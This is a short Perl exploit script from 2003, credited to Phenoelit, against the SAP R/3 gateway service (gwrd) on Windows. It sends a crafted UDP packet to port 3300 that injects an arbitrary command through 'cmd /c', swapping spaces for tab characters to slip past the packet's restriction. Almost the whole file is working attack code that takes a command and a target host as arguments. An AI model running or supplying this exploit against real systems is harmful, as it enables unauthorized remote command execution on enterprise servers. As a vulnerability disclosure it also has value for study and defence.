#!/usr/bin/perl -w
use IO::Socket;

#
# Executes the command given as first argument as a child process of 
# gwrd in Windows R/3 environments. Request packet may not contain space
# character (0x20). The command interpreter must obviously be modified 
# for other (UNIX) environments.
#
# 2003, FX of Phenoelit <fx@phenoelit.de>
#

$|=1;

# MSDN documentation of CreateProcess() :
# http://msdn.microsoft.com/library/en-us/dllproc/base/createprocess.asp

die "Give command" unless ($command=shift);
die "Give host" unless ($host=shift);
$port="3300" unless ($port=shift);

$command=~s/ /\x09/g;

$request = 
	"\x01".
	"\x02".
	"\x41\x42\x43".
	"\x01".
	"\x20".
	"\x00\x00\x00".
	"\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50".
	"\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51".
	"\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52".
	"\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53".
	"\x54\x54\x09\x09\x09\x09\x09\x09\x09\x09".
	"A\x09\x09\x09\x09\x09\x09\x09\x09".
	"AAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00".
	# Command to be injected, must end with && since 0x00 
	# termination does not work here
	"cmd\x09/c\x09(".$command.")\x09"."&&".
	"";


&send_UDP($host,$port);

exit 0;

sub send_UDP {
    my $remote;
    my $rline;
    my $dest;
    my $port;

    ($dest,$port) = @_;

    $remote =
      IO::Socket::INET->new(Proto=>"udp",PeerAddr=>$dest,PeerPort=>"$port",);
    unless ($remote) { die "cannot get socket for $dest" }
    $remote->autoflush(1);
    print $remote $request;

    close $remote;
}